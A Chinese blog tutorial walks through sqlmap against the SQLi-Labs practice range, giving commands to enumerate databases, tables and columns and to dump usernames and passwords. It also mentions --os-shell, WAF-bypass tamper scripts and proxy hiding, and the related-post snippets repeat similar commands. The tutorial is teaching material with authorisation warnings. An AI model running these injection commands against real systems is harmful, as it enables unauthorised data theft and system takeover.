Sqlmap使用教程

于 2025-04-15 01:07:35 发布
阅读量835 收藏 18
点赞数 37
文章标签: linux 运维 服务器 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wrjhs/article/details/147235741
版权

目录

一、简介

二、基础使用

2.1  Sqli-Labs使用

2.2  Sqlmap安装

2.3  Sqlmap使用

2.3.1  找寻注入点

2.3.2  获取数据库

2.3.3  获取表

2.3.4  获取字段

2.3.5  获取数据

2.3.6  其他

三、总结

此文章只用作教学目的,不可再未经他人同意的情况下去扫描别人的网站。

一、简介

SQLMap是一款自动化SQL注入工具,支持检测和利用多种数据库(如MySQL、Oracle、SQL Server等)的注入漏洞,能够获取数据库信息、文件系统访问权限甚至执行操作系统命令。

其核心功能包括:

  • 自动化检测注入点:自动识别GET/POST参数、Cookie等位置的注入漏洞。
  • 数据提取:获取数据库名、表、字段及数据。
  • 绕过WAF:通过篡改脚本绕过Web应用防火墙的检测 。
  • 操作系统交互:获取Shell权限或执行远程命令 。

二、基础使用

2.1  Sqli-Labs使用

此处使用SQL靶场来进行演示,SQL靶场的部署会在下一篇进行教学,如果要进行时间的话,可以在天狩CTF竞赛平台进行使用。

点击SQLi-Labs进行使用。SQLi-Labs是一个SQL注入靶场,使用靶场之前需要点击Setup/reset Database for labs进行安装环境。

 完成环境配置之后就可以进入关卡了。

2.2  Sqlmap安装

进入第一关后,直接启动Sqlmap来扫描网站,查看是否存在SQL注入漏洞。具体命令如下:

我是直接将Sqlmap安装在Windows上了,在Windows上,Sqlmap的运行要依靠python环境。

安装过程如下:

1、在网上下载Sqlmap的安装包,进行安装之后,如下:

2、在这个页面输入cmd启动命令行窗口,如下:

回车运行。

 3、在命令行中输入以下命令来运行Sqlmap,如下:

python sqlmap.py

出现这个页面说明运行成功了,接下来就可以进行使用了。

这是在Windows上,在kali系统中,默认安装了这个工具,直接使用就行。直接输入sqlmap,出现这个说明启动成功。

2.3  Sqlmap使用

2.3.1  找寻注入点

-u 参数,指定需要检测的url,单/双引号包裹。中间如果有提示,就输入y,如果不想这么麻烦,也可以在后面输入--batch ,这可以在后面的提示中默认为y。

SQLmap不能直接「扫描」网站漏洞,先用其他扫描工具扫出注入点,再用SQLmap验证并「利用」注入点。

python sqlmap.py -u http://challenge.qsnctf.com:30736/Less-1/?id=1 --batch

其中,我们发现了如下信息。

 

接下来,我们进行漏洞利用。

2.3.2  获取数据库

#获取所有数据库
python sqlmap.py -u http://challenge.qsnctf.com:30736/Less-1/?id=1 --dbs
#获取当前使用的数据库
python sqlmap.py -u http://challenge.qsnctf.com:30736/Less-1/?id=1 --current-db

所有数据库

当前数据库,当前数据库为security。

2.3.3  获取表

--tables 获取表,可以指定数据库,也可以列出所有的表。

#列出所有表
python sqlmap.py -u http://challenge.qsnctf.com:30736/Less-1/?id=1 --tables
#获取当前数据库的表
python sqlmap.py -u http://challenge.qsnctf.com:30736/Less-1/?id=1 -D 数据库名 -tables

所有表,会自动以不同数据库来排列

当前数据库中的表,扫描出了5个表。

 

2.3.4  获取字段

--columns 参数用来获取字段。

来指定获取哪个数据库的哪个表中的字段。

python sqlmap.py -u http://challenge.qsnctf.com:30736/Less-1/?id=1 -D 数据库名 -T 表名 --columns

 扫描security 中的users表中的表名,结果如下:

2.3.5  获取数据

--dump 获取值,也就是表中的数据。可以指定具体的库、表、字段。

例:获取security数据库中users表里的username和password的数据。

python sqlmap.py -u http://challenge.qsnctf.com:30736/Less-1/?id=1 -D 'security' -T 'users' -C 'username,password' --dump

获取到之后,下面会出现一个地址,那就是数据存放的地址。

 

2.3.6  其他

--batch (默认确认)不再询问是否确认。

--method=GET 指定请求方式(GET/POST)

--random-agent 随机切换UA(User-Agent)

--user-agent ' ' 使用自定义的UA(User-Agent)

--referer ' ' 使用自定义的 referer

--proxy="127.0.0.1:8080" 指定代理

--threads 10 设置线程数,最高10

--level=1 执行测试的等级(1-5,默认为1,常用3)

--risk=1 风险级别(0~3,默认1,常用1),级别提高会增加数据被篡改的风险。

三、总结

 基础使用通过 -u 指定目标 URL,配合 --dbs--tables--dump 逐步提取数据;高级技巧涵盖处理 POST 请求(--data)、Cookie 注入(--cookie)、盲注(--technique=B/T)及代理隐藏(--proxy)。实战中可通过 --os-shell 获取系统权限,或结合 --tamper=space2comment 绕过安全设备。

本文的介绍比较基础,下期会进行高阶版使用教程。

注意:不可再未经授权的情况下,扫描他人的网站进行测试。

 

任白小白
关注
史上最详细的sqlmap使用教程
大河之犬的博客
09-19 5万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
sqlmap使用教程
carmi的博客
01-19 834
SQLMAP是一个开放源码的渗透测试工具,它可以自动探测和利用SQL注入漏洞来接管数据库服务器。它配备了一个强大的探测引擎,为最终渗透测试人员提供很多强大的功能,可以拖库,可以访问底层的文件系统,还可以通过带外连接执行操作系统上的命令。
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
最新发布
ewii12567的博客
03-03 2759
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…这里root的权限最多,很明显它就是数据库的管理员账号。
SQLmap使用教程图文教程(超详细)
2401_84969692的博客
05-13 2816
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
sqlmap 使用教程
wangrui813的博客
01-12 1637
检查注入点: sqlmap -u http://aa.com/star_photo.php?artist_id=11 爆所有数据库信息: sqlmap -u http://aa.com/star_photo.php?artist_id=11 --dbs 爆当前数据库信息: sqlmap -u http://aa.com/star_photo.php?artist_id=11 --current-db 指定库名列出所有表 sqlmap -u http://aa.com/star_photo.ph
超详细sqlmap使用教程
2402_83134109的博客
01-07 714
网页是否存在注入点 -u ,-u为指定一个url作为目标,如果网页有登录时,直接写-u是无法扫描出来的,需要加--cookie参数,下图为探测DVWA注入关时截图,难度等级为低时。该命令的作用是查询完数据库后,查询指定数据库中所有的表名,如下所示。该命令的作用是列出数据库的用户的密码,如下所示。该命令的作用是查询完字段名之后,获取该字段中具体的数据信息,如下所示。该命令的作用是查询完表名后,查询该表中所有的字段名,如下所示。该命令的作用是列出当前网站使用的数据库用户,如下所示,运行该命令的结果如图所示。
SQLmap的简单使用
11-03
SQLmap是一款用来检测与利用SQL注入漏洞的免费开源自动化工具,目前支持的数据库是MySQL、Oracle、PostgreSQL、SQL Server、Access、DB2、SQLite、Sybase等。没有图形化界面,通过命令行进行操作。sqlmap只是用来检测和利用sql注入点的,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫除sql注入点。下面简单介绍一下sqlmap使用
Sqlmap使用方法
w1304099880的博客
10-26 1448
sqlmap是一个非常强大的sql注入检测与辅助工具,但是由于没有图形界面,基本上用起来比较麻烦。我们要了解这些语句。如下: 检查注入点: sqlmap-uhttp://ooxx.com.tw/star_photo.php?artist_id=11 爆所有数据库信息: sqlmap-uhttp://ooxx.com.tw/star_photo.php?artist_id=11--...
SQLMAP使用教程
CH3UHX9
02-07 1047
简介 sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。 具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。 支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2,SQLite,Firebird,Sybase和SAP MaxDB等数据库的各种安全
SQLMAP简单使用教程
一只web狗
06-21 1357
SQLMAP简单使用教程
sqlmap使用教程(包含POST型注入方式)
weixin_73904941的博客
10-25 7599
检测注入点以及可注入类型 sqlmap -u "网址" --batch -–batch(不再询问,默认执行) 查看所有数据库 --dbs sqlmap -u "网址" --batch --dbs 查看当前使用的数据库 --current-db sqlmap -u "网址" --batch --current-db 查看表名 sqlmap -u "网址" -D security --tables --batch -D 指定数据库 --tables 列举所有表名 ....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值